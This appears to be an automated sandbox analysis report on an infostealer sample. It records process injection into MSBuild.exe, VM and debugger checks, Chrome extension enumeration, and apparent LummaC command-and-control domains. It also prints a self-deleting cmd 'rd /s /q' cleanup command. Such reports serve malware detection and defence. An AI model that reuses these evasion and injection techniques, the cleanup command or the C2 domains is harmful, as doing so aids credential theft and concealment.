Source: C:\Windows\SysWOW64\timeout.exe TID: 2212	Thread sleep count: 77 > 30			Jump to behavior

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 3_2_00410DDB GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410EEEh

3_2_00410DDB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_00909ABF FindFirstFileExW,	0_2_00909ABF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	3_2_0041543D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,	3_2_00414CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_00409D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_0040D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	3_2_0040BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_00415FD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_0040B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	3_2_00415B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	3_2_0040CD37
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D19ABF FindFirstFileExW,	10_2_00D19ABF

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 3_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

3_2_00415142

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 3_2_00410FBA GetSystemInfo,wsprintfA,

3_2_00410FBA

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2175828757.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2205846539.0000000001196000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000B.00000002.2205846539.000000000114C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E08000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware-
Source: Amcache.hve.6.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.6.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: MSBuild.exe, 0000000B.00000002.2205846539.0000000001196000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW#
Source: Amcache.hve.6.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E08000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.6.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\KEGIDHJKKJ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\KEGIDHJKKJ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\f1r6P3j3g7.exe

Code function: 0_2_008F7922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_008F7922

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

3_2_00418A63

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_008F2003 mov edi, dword ptr fs:[00000030h]	0_2_008F2003
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_0091E385 mov eax, dword ptr fs:[00000030h]	0_2_0091E385
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_0091E37A mov eax, dword ptr fs:[00000030h]	0_2_0091E37A
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_0091E362 mov eax, dword ptr fs:[00000030h]	0_2_0091E362
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_00935582 mov eax, dword ptr fs:[00000030h]	0_2_00935582
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_0090A64C mov eax, dword ptr fs:[00000030h]	0_2_0090A64C
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_00900F2E mov ecx, dword ptr fs:[00000030h]	0_2_00900F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_004014AD mov eax, dword ptr fs:[00000030h]	3_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0040148A mov eax, dword ptr fs:[00000030h]	3_2_0040148A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_004014A2 mov eax, dword ptr fs:[00000030h]	3_2_004014A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_004186A9 mov eax, dword ptr fs:[00000030h]	3_2_004186A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_004186AA mov eax, dword ptr fs:[00000030h]	3_2_004186AA
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D02003 mov edi, dword ptr fs:[00000030h]	10_2_00D02003
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D1A64C mov eax, dword ptr fs:[00000030h]	10_2_00D1A64C
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D10F2E mov ecx, dword ptr fs:[00000030h]	10_2_00D10F2E

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\f1r6P3j3g7.exe

Code function: 0_2_0090CC4B GetProcessHeap,

0_2_0090CC4B

Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_008F7610 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_008F7610
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_008F7922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_008F7922
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_008F7AAF SetUnhandledExceptionFilter,	0_2_008F7AAF
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_008FDA73 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_008FDA73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0041D12A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0041D12A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0041DAAC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0041DAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0042774E SetUnhandledExceptionFilter,	3_2_0042774E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBDB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_6CBDB66C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBDB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6CBDB1F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD8AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6CD8AC62
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D07610 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00D07610
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D07922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00D07922
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D07AAF SetUnhandledExceptionFilter,	10_2_00D07AAF
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D0DA73 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00D0DA73

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: f1r6P3j3g7.exe PID: 6532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6628, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\ProgramData\KEGIDHJKKJ.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write			Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 3_2_0040F54A _memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,

3_2_0040F54A

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\ProgramData\KEGIDHJKKJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A			Jump to behavior

LummaC encrypted strings found

Source: KEGIDHJKKJ.exe	String found in binary or memory: frizzettei.sbs
Source: KEGIDHJKKJ.exe	String found in binary or memory: isoplethui.sbs
Source: KEGIDHJKKJ.exe	String found in binary or memory: exemplarou.sbs
Source: KEGIDHJKKJ.exe	String found in binary or memory: invinjurhey.sbs
Source: KEGIDHJKKJ.exe	String found in binary or memory: wickedneatr.sbs
Source: KEGIDHJKKJ.exe	String found in binary or memory: exilepolsiy.sbs
Source: KEGIDHJKKJ.exe	String found in binary or memory: laddyirekyi.sbs
Source: KEGIDHJKKJ.exe	String found in binary or memory: bemuzzeki.sbs

Searches for specific processes (likely to inject)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_004124A8 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		3_2_004124A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0041257F __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		3_2_0041257F

Writes to foreign memory regions

Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 430000	Jump to behavior
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43D000	Jump to behavior
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 670000	Jump to behavior
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 671000	Jump to behavior
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 894008	Jump to behavior
Source: C:\ProgramData\KEGIDHJKKJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\ProgramData\KEGIDHJKKJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000	Jump to behavior
Source: C:\ProgramData\KEGIDHJKKJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 44B000	Jump to behavior
Source: C:\ProgramData\KEGIDHJKKJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 44E000	Jump to behavior
Source: C:\ProgramData\KEGIDHJKKJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 45E000	Jump to behavior
Source: C:\ProgramData\KEGIDHJKKJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D09008	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\ProgramData\KEGIDHJKKJ.exe "C:\ProgramData\KEGIDHJKKJ.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BGIJDGCAEBFI" & exit	Jump to behavior
Source: C:\ProgramData\KEGIDHJKKJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\f1r6P3j3g7.exe

Code function: 0_2_0091E013 cpuid

0_2_0091E013

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	0_2_0090C085
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: GetLocaleInfoW,	0_2_0090622B
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,__calloc_crt,_free,	0_2_009423DB
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: EnumSystemLocalesW,	0_2_0090C327
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: EnumSystemLocalesW,	0_2_0090C372
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_0090C498
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: EnumSystemLocalesW,	0_2_0090C40D
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_0094456E
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: GetLocaleInfoW,	0_2_0090C6EB
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_0090C814
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_0090C9E9
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: GetLocaleInfoW,	0_2_0090C91A
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,	0_2_00946A48
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_free,_free,_free,_free,_free,_free,_free,_free,_free,	0_2_00947B38
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	0_2_00945DBC
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: EnumSystemLocalesW,	0_2_00905D7F
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,	0_2_00946D66
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	3_2_00410DDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_0042B1EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	3_2_0042B2E1
